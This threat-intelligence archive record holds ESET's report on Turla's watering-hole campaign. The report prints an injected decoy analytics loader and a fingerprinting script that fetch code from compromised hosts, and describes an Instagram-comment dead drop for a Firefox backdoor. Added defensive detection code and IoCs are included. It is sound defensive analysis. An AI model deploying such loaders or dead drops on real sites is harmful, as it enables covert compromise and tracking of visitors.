{
	"id": "fa6d412d-f355-46c1-8bf0-8f234df503d3",
	"created_at": "2026-04-06T00:12:31.287506Z",
	"updated_at": "2026-04-10T03:37:32.597347Z",
	"deleted_at": null,
	"sha1_hash": "dbaa61309a306717ebc147705d25a9f465ecad7c",
	"title": "Turla’s watering hole campaign: An updated Firefox extension abusing Instagram",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 751733,
	"plain_text": "Turla’s watering hole campaign: An updated Firefox extension\r\nabusing Instagram\r\nBy Jean-Ian Boutin\r\nArchived: 2026-04-05 13:01:06 UTC\r\nUpdate, 21 June 2017: Due to our misunderstanding of communications with Google, the Firefox extension’s\r\ninfection vector discussed below was wrongly described here on 06 June 2017; this is now corrected.  Apologies\r\nto Google and our readers for the unintentional misrepresentation in our original post.\r\nSome of the tactics used in APT attacks die hard. A good example is provided by Turla’s watering hole campaigns.\r\nTurla, which has been targeting governments, government officials and diplomats for years – see, as an example,\r\nthis recent paper – is still using watering hole techniques to redirect potentially interesting victims to their C\u0026C\r\ninfrastructure. In fact, they have been using them since at least 2014 with very few variations in their modus\r\noperandi.\r\nA watering hole attack compromises websites that are likely to be visited by targets of interest. The people behind\r\nTurla are apparently keen on targeting embassy websites. Indeed, there was a February 2017 blogpost by\r\nForcepoint highlighting some of the websites most recently compromised.\r\nWe, of course, are monitoring the developments of these campaigns closely and recently noticed them reusing a\r\ntechnique that we haven’t seen them use for several months.\r\nInitial compromise\r\nIn the IoCs section below, there is a list of websites that have been used to redirect to Turla watering hole C\u0026Cs in\r\nthe past. As is usual with this group, there are many websites directly related to embassies throughout the world.\r\nThe websites’ visitors will be redirected to a malicious server because of a snippet - inserted by the attacker -\r\nappended to the original page. 
The scripts we saw in the last few months were all similar to this one:\r\n\u003c!-- Clicky Web Analytics (start) --\u003e\r\n\u003cscript type=\"text/javascript\"\u003e// \u003c![CDATA[\r\nvar clicky_site_ids = clicky_site_ids || [];\r\nclicky_site_ids.push(100673048);\r\n(function() {\r\nvar s = document.createElement('script');\r\nvar a = 'http://www.mentalhealthcheck.net/';\r\nvar b = 'update/counter.js';\r\ns.type = 'text/javascript'; s.async = true;\r\ns.src = '//static.getclicky.com/js'; s.src = a.concat(b);\r\n( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(s);\r\n})();\r\n// ]]\u003e\u003c/script\u003e\r\nThe attackers added a reference to Clicky, a real-time web analytics framework. The Clicky comment, the site-ID boilerplate and the first assignment to s.src are there only to make the appended script pass a cursory, or non-expert, examination: the legitimate Clicky URL is overwritten on the very same line by a.concat(b), so Clicky itself is never loaded. The only script the browser actually fetches is mentalhealthcheck.net/update/counter.js. This is a server the Turla gang has been using to push fingerprinting scripts (scripts that gather information about the system they run on) to interesting victims. A deceptive reference to the Google Analytics script was used in a similar fashion for a while, but now Clicky is what we see the most. You can find in the IoCs section the various watering hole C\u0026Cs that we saw in the last couple of months. All of these C\u0026Cs are compromised legitimate servers.\r\nThe next step in the attack is to distribute a fingerprinting JavaScript to interesting targets. To do this, the C\u0026C filters visitors by IP range. If they are within the targeted IP range, they receive the fingerprinting script. 
If not, they just receive a benign script: a JS implementation of the MD5 hashing algorithm. Below we show an excerpt of the deobfuscated script that is received by victims coming from a targeted IP range:\r\nfunction cb_custom() {\r\n// fetch PluginDetect (pde.js) from the same server, then run cb_custom1\r\nloadScript(\"http://www.mentalhealthcheck.net/script/pde.js\", cb_custom1);\r\n}\r\nfunction cb_custom1() {\r\nPluginDetect.getVersion('.');\r\n// plugin versions collected into myResults, later sent to the C\u0026C\r\nmyResults['Java']=PluginDetect.getVersion('Java');\r\nmyResults['Flash']=PluginDetect.getVersion('Flash');\r\nmyResults['Shockwave']=PluginDetect.getVersion('Shockwave');\r\nmyResults['AdobeReader']=PluginDetect.getVersion('AdobeReader') || PluginDetect.getVersion('PDFReader');\r\n// evercookie: a tracking identifier replicated across many browser storage mechanisms\r\nvar ec = new evercookie();\r\nec.get('thread', getCookie)\r\nThis JavaScript downloads a JS library called PluginDetect that collects information about the plugins installed in the browser; here the Java, Flash, Shockwave and Adobe Reader versions. The information collected is then sent to the C\u0026C server.\r\nIt also tries to install an evercookie, or so-called super cookie, that tracks the user throughout his browsing, across all sites on the internet.\r\nFor those familiar with this group's waterholing techniques, it is clear they are still using their old, publicly known, tried-and-true methods.\r\nFirefox extension\r\nThrough our monitoring of these watering hole campaigns, we happened upon a very interesting sample. Some of you may remember the Pacifier APT report by BitDefender describing a spearphishing campaign with a malicious Microsoft Word document sent to several institutions worldwide. These malicious documents would then drop a backdoor. We now know that this report describes Skipper, a first stage backdoor used by the Turla gang.\r\nThat report also contains a description of a Firefox extension dropped by the same type of malicious document. 
It turns out we have found what most likely is an update of this Firefox extension. It is a JavaScript backdoor, different in implementation from the one described in the Pacifier APT report, but with similar functionality.\r\nWe noticed that this extension could have been distributed through a forged copy of a Swiss security company's website. Unsuspecting visitors to this website were asked to install this malicious extension. The extension is a simple backdoor, but with an interesting way of fetching its C\u0026C domain.\r\nThe use of Instagram\r\nThe extension uses a bit.ly URL to reach its C\u0026C, but the URL path is nowhere to be found in the extension code. Instead, it obtains this path from the comments posted on a specific Instagram post. The one used in the analyzed sample was a comment on a photo posted to the Britney Spears official Instagram account.\r\n© https://www.instagram.com/p/BO8gU41A45g/\r\nThe extension looks at each of the photo’s comments and computes a custom hash value over it. If the hash matches 183, it runs this regular expression on the comment in order to obtain the path of the bit.ly URL:\r\n(?:\\\\u200d(?:#|@)(\\\\w)\r\nLooking at the photo’s comments, there was only one for which the hash matches 183. This comment was posted on February 6, while the original photo was posted in early January. Taking the comment and running it through the regex, you get the following bit.ly URL:\r\nhttp://bit.ly/2kdhuHX\r\nLooking a bit more closely at the regular expression, we see it is looking for the Unicode character U+200D, optionally followed by @ or #, and captures the single word character after it. As printed above the expression is missing its closing parenthesis; read as \\u200d(?:#|@)?(\\w) it reproduces 2kdhuHX from the comment below, which is only possible if the # or @ is optional. 
This character is a non-printable character called 'Zero Width Joiner', normally used to glue several emoji into one combined glyph. Pasting the actual comment or looking at its source, you can see that this character (shown here as \u003c200d\u003e) precedes each character that makes up the path of the bit.ly URL:\r\nsmith2155\u003c200d\u003e#2hot ma\u003c200d\u003eke lovei\u003c200d\u003ed to \u003c200d\u003eher, \u003c200d\u003euupss \u003c200d\u003e#Hot \u003c200d\u003e#X\r\nWhen resolved, this shortened link leads to static.travelclothes.org/dolR_1ert.php, which was used in the past as a watering hole C\u0026C by the Turla crew.\r\nAs is the case with all bit.ly links, it is possible to get statistics on who clicked the link (append a + to the short URL).\r\nThose statistics showed only 17 hits recorded on this link in February, right around the time the comment was posted. This is quite a low number and might indicate that it was only a test run.\r\nTechnical analysis\r\nThis Firefox extension implements a simple backdoor. It first gathers information on the system it is running on and sends it to the C\u0026C, encrypted using AES. This is very similar to what the extension described in the Pacifier APT white paper does.\r\nThe backdoor component has the ability to run four different types of commands:\r\nexecute arbitrary file\r\nupload file to C\u0026C\r\ndownload file from C\u0026C\r\nread directory content - send a file listing, along with sizes and dates, to C\u0026C\r\nWhile we believe this to be some type of test, the next version of the extension - if there is one - is likely to be very different. 
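Reading the Initial compromise snippet by eye means noticing that s.src is assigned twice and that only the second assignment counts. The scanner below automates that check; it is an added example, not code from the original post. It extracts inline script bodies from an HTML string, follows the string forms the snippet uses (quoted literals, var-to-literal, .concat() and +) and reports every script element whose effective src differs from the first one assigned. The sample page is constructed here from the snippet quoted in the post, with its type attribute re-quoted, plus a benign loader for contrast; the semicolon statement splitter and the string resolver understand only those forms and return null for anything else, an assumption a real deployment would replace with a proper JavaScript parser.

```javascript
// Added example (not from the original post): report inline scripts whose
// effective src is not the src a quick read suggests, the tell of the decoy
// Clicky loader. Assumptions: the page HTML is available as a string, and
// only quoted literals, var-to-literal, .concat() and + are resolved.
const DQ = String.fromCharCode(34); // double-quote character
const SQ = String.fromCharCode(39); // single-quote character

// Bodies of all inline script elements, in document order.
function inlineScripts(html) {
  const re = new RegExp('<script[^>]*>([^]*?)</script>', 'gi');
  return Array.from(html.matchAll(re), (m) => m[1]);
}

// Resolve a string-valued expression against known string variables.
// Returns null for anything it does not understand (calls, objects, ...).
function resolveString(expr, vars) {
  expr = expr.trim();
  const q = expr[0];
  if ((q === DQ || q === SQ) && expr.length > 1 && expr[expr.length - 1] === q) {
    return expr.slice(1, -1);
  }
  const c = expr.indexOf('.concat(');
  if (c > 0 && expr[expr.length - 1] === ')') {
    const base = resolveString(expr.slice(0, c), vars);
    const arg = resolveString(expr.slice(c + 8, -1), vars);
    return base === null || arg === null ? null : base + arg;
  }
  if (expr.indexOf('+') > 0) {
    const parts = expr.split('+').map((p) => resolveString(p, vars));
    return parts.some((p) => p === null) ? null : parts.join('');
  }
  return Object.prototype.hasOwnProperty.call(vars, expr) ? vars[expr] : null;
}

// Walk a script body statement by statement (toy splitter on semicolons),
// recording string variables and every assignment to a .src property.
function srcAssignments(body) {
  const vars = {};
  const assigns = {}; // element expression -> resolved src values, in order
  for (const raw of body.split(';')) {
    const stmt = raw.trim();
    const eq = stmt.indexOf('=');
    if (eq < 0 || stmt[eq + 1] === '=' || stmt[eq - 1] === '!') continue;
    const lhs = stmt.slice(0, eq).trim();
    const rhs = stmt.slice(eq + 1);
    const v = lhs.lastIndexOf('var ');
    if (v >= 0) {
      const value = resolveString(rhs, vars);
      if (value !== null) vars[lhs.slice(v + 4).trim()] = value;
    } else if (lhs.endsWith('.src')) {
      const el = lhs.slice(0, -4);
      (assigns[el] = assigns[el] || []).push(resolveString(rhs, vars));
    }
  }
  return assigns;
}

// Host of a URL, tolerating the protocol-relative form used by the decoy.
function hostOf(url) {
  if (url === null) return null;
  try { return new URL(url.startsWith('//') ? 'http:' + url : url).hostname; } catch (e) { return null; }
}

// One finding per script element whose last src differs from its first.
function findDecoyLoaders(html) {
  const findings = [];
  inlineScripts(html).forEach((body, script) => {
    const assigns = srcAssignments(body);
    for (const element of Object.keys(assigns)) {
      const srcs = assigns[element];
      const first = srcs[0];
      const effective = srcs[srcs.length - 1];
      if (srcs.length > 1 && first !== effective) {
        findings.push({ script, element, first, effective, host: hostOf(effective) });
      }
    }
  });
  return findings;
}

// Constructed sample page: the injected snippet quoted in the post (type
// attribute re-quoted), then a benign loader that assigns src exactly once.
const SAMPLE_PAGE = `<html><head>
<!-- Clicky Web Analytics (start) -->
<script type='text/javascript'>// <![CDATA[
var clicky_site_ids = clicky_site_ids || [];
clicky_site_ids.push(100673048);
(function() {
var s = document.createElement('script');
var a = 'http://www.mentalhealthcheck.net/';
var b = 'update/counter.js';
s.type = 'text/javascript'; s.async = true;
s.src = '//static.getclicky.com/js'; s.src = a.concat(b);
( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(s);
})();
// ]]></script>
<script>var t = document.createElement('script'); t.src = '//static.getclicky.com/js'; document.head.appendChild(t);</script>
</head><body></body></html>`;
```

Run findDecoyLoaders over each page fetched from a site you own or monitor: on the sample it returns a single finding for element s, first src //static.getclicky.com/js and effective src http://www.mentalhealthcheck.net/update/counter.js. A finding whose host is not a vendor you expect is the loader used in this campaign, while a legitimate loader assigns src once and never shows up.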
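The comment-to-URL step described in the Instagram section, written out as an added example; this is not code from the original post or from the extension itself. Two assumptions are baked in and marked in the comments: the # or @ after the Zero Width Joiner is treated as optional, because that is the only reading of the printed regex that turns the quoted comment into 2kdhuHX, and the extension's custom hash (the value 183 check) is not published, so the candidate filter is a stand-in heuristic that counts joiners sitting between ordinary characters, where a genuine emoji sequence would have none.

```javascript
// Added example (not from the original post or the extension): recover the
// bit.ly path hidden in an Instagram comment behind Zero Width Joiner
// (U+200D) characters, and score comments for the same trick.
// Assumptions: the # or @ after the joiner is optional (the only reading of
// the printed regex that turns the quoted comment into 2kdhuHX); the
// extension's real candidate filter (custom hash == 183) is not published,
// so suspiciousComments uses a stray-joiner count as a stand-in.

const ZWJ = String.fromCharCode(0x200d);

// U+200D, an optional # or @, then one captured word character.
// [A-Za-z0-9_] spells out the usual word-character class.
const HIDDEN_CHAR = new RegExp(ZWJ + '[#@]?([A-Za-z0-9_])', 'g');

// The hidden path is every character that directly follows a joiner.
function extractBitlyPath(comment) {
  return Array.from(comment.matchAll(HIDDEN_CHAR), (m) => m[1]).join('');
}

// The shortened URL the extension would resolve next, or null if none.
function buildBitlyUrl(comment) {
  const path = extractBitlyPath(comment);
  return path ? 'http://bit.ly/' + path : null;
}

// Defender side: a joiner belongs between two emoji (surrogate pairs in
// UTF-16). One sitting between two ordinary characters is a stray.
function countStrayZwj(text) {
  const isSurrogate = (code) => code >= 0xd800 && code <= 0xdfff;
  let stray = 0;
  for (let i = 0; i < text.length; i++) {
    if (text[i] !== ZWJ) continue;
    const prev = i > 0 ? text.charCodeAt(i - 1) : 0;
    const next = i + 1 < text.length ? text.charCodeAt(i + 1) : 0;
    if (!isSurrogate(prev) && !isSurrogate(next)) stray++;
  }
  return stray;
}

// Rank comments by stray joiners and show what each would decode to.
function suspiciousComments(comments, minStray) {
  return comments
    .map((c) => ({ comment: c, stray: countStrayZwj(c), path: extractBitlyPath(c) }))
    .filter((r) => r.stray >= minStray)
    .sort((a, b) => b.stray - a.stray);
}

// Constructed sample: the comment quoted in the post, with its <200d>
// placeholders replaced by real U+200D characters, plus two ordinary
// comments, one of them containing a legitimate emoji joiner sequence.
const TURLA_COMMENT = ['smith2155', '#2hot ma', 'ke lovei', 'd to ', 'her, ',
  'uupss ', '#Hot ', '#X'].join(ZWJ);
const FAMILY_EMOJI = String.fromCodePoint(0x1f468) + ZWJ + String.fromCodePoint(0x1f469);
const SAMPLE_COMMENTS = ['love this pic!!', TURLA_COMMENT, 'goals ' + FAMILY_EMOJI];

// extractBitlyPath(TURLA_COMMENT)  -> '2kdhuHX'
// countStrayZwj(TURLA_COMMENT)     -> 7, countStrayZwj(FAMILY_EMOJI) -> 0
// suspiciousComments(SAMPLE_COMMENTS, 3).length -> 1
```

Feed the real comment (with actual U+200D characters, which the post renders as <200d> placeholders) to extractBitlyPath and it returns 2kdhuHX, which buildBitlyUrl turns into the http://bit.ly/2kdhuHX link the post resolved. The stray-joiner count is a cheap hunting signal for comment-based dead drops of this kind, because legitimate joiners almost always sit between two emoji code points rather than between ASCII letters.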
There are several APIs used by the extension that will disappear in future versions of Firefox. For example, it uses XPCOM to write files to disk and sdk/system/child_process to launch a process. These are only available to legacy add-ons (XPCOM-based and Add-on SDK extensions), which are superseded by WebExtensions starting with Firefox 57. From that version onwards, Firefox no longer loads legacy add-ons, thus preventing the use of these APIs.\r\nConclusion\r\nThe fact that the Turla actors are using social media as a way to obtain their C\u0026C servers is quite interesting. This behavior has already been observed in the past with other threat crews such as the Dukes. Attackers using social media to recover a C\u0026C address make life harder for defenders. Firstly, it is difficult to distinguish malicious traffic to social media from legitimate traffic. Secondly, it gives the attackers more flexibility when it comes to changing the C\u0026C address as well as erasing all traces of it. It is also interesting to see that they are recycling an old way of fingerprinting a victim while finding new ways to make the C\u0026C retrieval a bit more difficult.\r\nFor any inquiries, or to make sample submissions related to the subject, contact us at: threatintel@eset.com.\r\nAcknowledgements\r\nWe would like to thank Clement Lecigne from Google’s Threat Analysis Group for his help researching this campaign.\r\nIoCs\r\nFirefox extension hash\r\nFile name SHA-1\r\nhtml5.xpi 5ba7532b4c89cc3f7ffe15b6c0e5df82a34c22ea\r\nhtml5.xpi 8e6c9e4582d18dd75162bcbc63e933db344c5680\r\nObserved compromised websites redirecting to fingerprinting servers\r\nAs of this writing all these sites are now clean or pointing to dead fingerprinting servers.\r\nURL Description\r\nhxxp://www.namibianembassyusa.org Namibia Embassy – USA\r\nhxxp://www.avsa.org African Violet Society of 
America\r\nhxxp://www.zambiaembassy.org Zambian Embassy – USA\r\nhxxp://russianembassy.org Russian Embassy – USA\r\nhxxp://au.int African Union\r\nhxxp://mfa.gov.kg Ministry of Foreign Affairs – Kyrgyzstan\r\nhxxp://mfa.uz Ministry of Foreign Affairs – Uzbekistan\r\nhxxp://www.adesyd.es ADESyD - Asociación de Diplomados Españoles en Seguridad y Defensa\r\nhxxp://www.bewusstkaufen.at Web portal for sustainable consumption in Austria\r\nhxxp://www.cifga.es Cifga Laboratory, working on the development of marine toxin standards\r\nhxxp://www.jse.org Juventudes Socialistas de España (JSE)\r\nhxxp://www.embassyofindonesia.org Embassy of Indonesia – USA\r\nhxxp://www.mischendorf.at Town of Mischendorf – Austria\r\nhxxp://www.vfreiheitliche.at Political party in Bregenz, Austria\r\nhxxp://www.xeneticafontao.com Fontao Genetics, S.A., established in 1998, responsible for the management of the Centre for Animal Selection and Reproduction of Galicia (Holstein and Rubia Gallega breeds)\r\nhxxp://iraqiembassy.us Embassy of Iraq – USA\r\nhxxp://sai.gov.ua Management of road safety (Ukraine)\r\nhxxp://www.mfa.gov.md Ministry of Foreign Affairs – Moldova\r\nhxxp://mkk.gov.kg State Personnel Service – Kyrgyzstan\r\nCompromised websites used as first stage C\u0026C in watering hole campaigns\r\nhxxp://www.mentalhealthcheck.net/update/counter.js (hxxp://bitly.com/2hlv91v+)\r\nhxxp://www.mentalhealthcheck.net/script/pde.js\r\nhxxp://drivers.epsoncorp.com/plugin/analytics/counter.js\r\nhxxp://rss.nbcpost.com/news/today/content.php\r\nhxxp://static.travelclothes.org/main.js\r\nhxxp://msgcollection.com/templates/nivoslider/loading.php\r\nhxxp://versal.media/?atis=509\r\nhxxp://www.ajepcoin.com/UserFiles/File/init.php 
(hxxp://bit.ly/2h8Lztj+)\r\nhxxp://loveandlight.aws3.net/wp-includes/theme-compat/akismet.php\r\nhxxp://alessandrosl.com/core/modules/mailer/mailer.php\r\nSource: https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/"
	],
	"report_names": [
		"turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434351,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dbaa61309a306717ebc147705d25a9f465ecad7c.pdf",
		"text": "https://archive.orkl.eu/dbaa61309a306717ebc147705d25a9f465ecad7c.txt",
		"img": "https://archive.orkl.eu/dbaa61309a306717ebc147705d25a9f465ecad7c.jpg"
	}
}